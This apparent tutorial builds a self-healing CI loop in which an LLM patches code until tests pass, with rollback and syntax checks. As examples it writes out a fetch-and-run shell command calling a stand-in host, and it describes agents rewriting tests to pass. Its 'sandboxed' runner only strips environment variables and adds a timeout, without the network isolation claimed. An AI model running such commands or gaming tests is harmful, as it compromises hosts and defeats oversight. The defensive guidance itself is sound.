We've all watched an AI code assistant generate a "perfect" function that immediately fails your test suite. Let's build a secure, self-healing CI loop that feeds stack traces back to the agent and keeps patching the code until the tests actually pass—without giving the LLM the ability to execute malware on your host infrastructure.
## Why This Matters (The Audit Perspective)
Single-shot AI code generation is a solved problem; the frontier is autonomous iteration. Automating the "read error → patch code → run test" cycle transforms your agent from a glorified autocomplete into an active worker. We refer to this as the "Ralph Wiggum Loop": the agent fails, realizes it is in danger, attempts a fix, and repeats until it escapes the failing state.
However, after auditing dozens of early agentic workflows, the security and state-management flaws are glaring. If you write an LLM's raw output to disk and run subprocess.run(["pytest"]) on your bare-metal CI runner, you have created a massive Remote Code Execution (RCE) vulnerability. If the LLM hallucinates import os; os.system("curl malicious.sh | bash"), your runner is compromised. Furthermore, if the loop exhausts its max attempts, it often leaves the codebase in a broken, half-refactored state.
We must implement this loop with strict file-system rollbacks, syntax validation, and sandboxed execution.
## How It Works: The Hardened State Machine

The architecture is a deterministic state machine wrapping a non-deterministic LLM:

1. **Extraction & Validation:** The agent proposes a code change. We use a regex to strip conversational Markdown and the `ast` module to verify it is valid Python before writing to disk.
2. **Snapshot:** The system backs up the target file's original state.
3. **Execution:** The system applies the patch and runs the test suite in a restricted, network-isolated environment with a hard timeout.
4. **Feedback:** Truncated error logs are appended to the agent's context, instructing it to fix the specific failure.
5. **Rollback:** If the loop hits `MAX_ITERATIONS` without passing, the system automatically reverts the file to its original snapshot.
## The Code: The Self-Healing Execution Harness

Here is a hardened reference implementation of the self-fixing loop in Python. Notice the strict Markdown extraction, the AST syntax gate, and the state-rollback context manager.
```python
import subprocess
import os
import re
import ast
from typing import List, Dict

# Mock LLM client (replace with the Anthropic/OpenAI SDK)
def generate_patch(messages: List[Dict[str, str]]) -> str:
    """Simulates an LLM generating Python code."""
    raise NotImplementedError("Wire this up to your model provider.")

class FileRollbackManager:
    """Context manager to ensure the codebase isn't left in a broken state."""
    def __init__(self, filepath: str):
        self.filepath = filepath
        self.original_content = ""

    def __enter__(self):
        with open(self.filepath, "r") as f:
            self.original_content = f.read()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        if exc_type is not None:  # Revert on failure
            with open(self.filepath, "w") as f:
                f.write(self.original_content)

class SecureAgenticCILoop:
    def __init__(self, target_file: str, test_command: List[str], max_attempts: int = 5):
        self.target_file = target_file
        self.test_command = test_command
        self.max_attempts = max_attempts
        self.history: List[Dict[str, str]] = []
        # SECURITY: only allow modifications to specific target files
        self.allowed_files = {"src/calculator.py", "src/data_parser.py"}
        if self.target_file not in self.allowed_files:
            raise PermissionError(f"SECURITY ALERT: {self.target_file} is not allow-listed.")

    def extract_and_validate_code(self, llm_output: str) -> str:
        """Strips Markdown and validates the AST before touching the disk."""
        match = re.search(r"```(?:python)?\s*\n(.*?)```", llm_output, re.DOTALL)
        code = match.group(1) if match else llm_output
        ast.parse(code)  # raises SyntaxError on malformed output
        return code

    def run_tests_sandboxed(self) -> subprocess.CompletedProcess:
        """Runs the tests with a hard timeout and a stripped environment."""
        env = {"PATH": os.environ.get("PATH", "")}
        return subprocess.run(self.test_command, capture_output=True, text=True,
                              timeout=60, env=env)

    def run(self, task_prompt: str) -> bool:
        self.history.append({"role": "user", "content": task_prompt})
        with FileRollbackManager(self.target_file):
            for attempt in range(1, self.max_attempts + 1):
                raw = generate_patch(self.history)
                self.history.append({"role": "assistant", "content": raw})
                try:
                    code = self.extract_and_validate_code(raw)
                except SyntaxError as e:
                    self.history.append({"role": "user", "content": f"Invalid Python: {e}"})
                    continue
                with open(self.target_file, "w") as f:
                    f.write(code)
                result = self.run_tests_sandboxed()
                if result.returncode == 0:
                    return True  # Tests pass; keep the patch
                # Truncate the trace to protect the context window
                trace = (result.stdout + result.stderr)[-2000:]
                self.history.append({"role": "user",
                                     "content": f"Attempt {attempt} failed:\n{trace}\nFix it."})
            # Exhausted attempts: raising triggers the rollback in __exit__
            raise RuntimeError(f"No passing patch after {self.max_attempts} attempts; reverted.")
```
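One subtlety worth internalizing: the `ast.parse` gate is a *syntax* check, not a security check. Hostile-but-valid Python sails straight through it, which is exactly why the sandboxed execution step is non-negotiable. A quick standalone demonstration:

```python
import ast

# Valid Python parses cleanly even when it's hostile -- ast.parse only
# rejects *malformed* output, so sandboxing must handle malicious output.
hostile = 'import os\nos.system("curl malicious.sh | bash")'
ast.parse(hostile)  # no exception: syntactically fine

try:
    ast.parse("def broken(:")  # typical garbled LLM output
except SyntaxError:
    print("rejected before touching the disk")
```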
## Pitfalls and Gotchas

When building self-healing CI loops, watch out for these traps:

- **The Markdown Wrapper Bug:** LLMs almost always wrap their code in Markdown fences (e.g., `` ```python ``). If you blindly write the LLM's response to `calculator.py`, the file will instantly throw a `SyntaxError`. You must include the regex extraction step.
- **The Cheating Agent:** If you do not strictly separate the code under test from the test files themselves, the LLM will eventually realize the easiest way to make the tests pass is to rewrite your test file to `assert True`. Always enforce an allowed-files list that entirely excludes the `tests/` directory.
- **Context Window Exhaustion:** Test frameworks like Pytest or Jest spit out massive stack traces. If you blindly append the full `stderr` to the `history` array on every loop, you will quickly blow out your API token limits. Aggressively truncate the error logs before feeding them back.
- **The Oscillating Loop:** Sometimes the agent toggles between two broken states (Patch A fixes Bug 1 but causes Bug 2; Patch B fixes Bug 2 but regresses Bug 1). If the loop eats up all attempts without progress, the model is trapped in a local minimum and must be aborted.
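A simple head-and-tail slice handles the truncation pitfall well, since test runners tend to put the signal at both ends of the trace. A minimal sketch (the helper name and the 2,000-character budget are illustrative choices, not from the harness above):

```python
def truncate_trace(trace: str, budget: int = 2000) -> str:
    """Keep the head (collection summary) and the tail (the actual
    assertion failure), dropping the noisy middle of the trace."""
    if len(trace) <= budget:
        return trace
    half = budget // 2
    return trace[:half] + "\n... [truncated] ...\n" + trace[-half:]

# A pathological 50k-character pytest dump shrinks to roughly the budget
long_trace = "FAILED tests/test_calc.py " + "x" * 50_000 + " E  AssertionError"
short = truncate_trace(long_trace)
```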
## What to Try Next

Ready to make your CI pipelines autonomous? Try these implementations next:

- **Dockerized Test Runners:** Upgrade the `run_tests_sandboxed` method to use the Docker SDK (`docker.from_env().containers.run(...)`). This ensures the LLM-generated code runs in an isolated, ephemeral container with `--network none`, neutralizing any malicious API calls or filesystem-wiping attempts.
- **Git-Backed Rollbacks:** Instead of a simple in-memory `FileRollbackManager`, enhance the system to commit every attempted iteration to a temporary Git branch. If the agent hits the max attempts, you can easily bisect the agent's commits to see exactly where its logic went off the rails.
- **The "Give Up" Circuit Breaker:** Introduce an "LLM-as-a-Judge" step. After three failed iterations, have a smaller, cheaper model (like Claude Haiku or Gemini Flash) review the trace history to determine whether the main agent is actually making progress or just hallucinating in circles. If it is stuck, abort the loop early to save API costs.
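As a stepping stone toward the Dockerized runner, you can shell out to the `docker` CLI before reaching for the SDK. This sketch only builds the invocation; `build_sandboxed_command`, the image tag, and the resource limits are illustrative assumptions, and it presumes a local `docker` binary:

```python
from typing import List

def build_sandboxed_command(image: str, workdir: str, test_cmd: List[str]) -> List[str]:
    """Wrap a test command in an ephemeral, locked-down container invocation."""
    return [
        "docker", "run", "--rm",
        "--network", "none",       # no exfiltration, no `curl | bash`
        "--memory", "512m",        # cap runaway allocations
        "--pids-limit", "128",     # cap fork bombs
        "-v", f"{workdir}:/app",   # mount only the project directory
        "-w", "/app",
        image,
    ] + test_cmd

cmd = build_sandboxed_command("python:3.12-slim", "/tmp/project", ["pytest", "-x"])
# Pass `cmd` to subprocess.run(...) in place of the raw test command
```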